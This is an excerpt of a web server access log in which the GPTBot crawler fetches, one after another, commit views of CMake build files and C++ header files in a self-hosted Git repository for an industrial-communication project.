"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11586] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 12274] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:18:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13150] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr 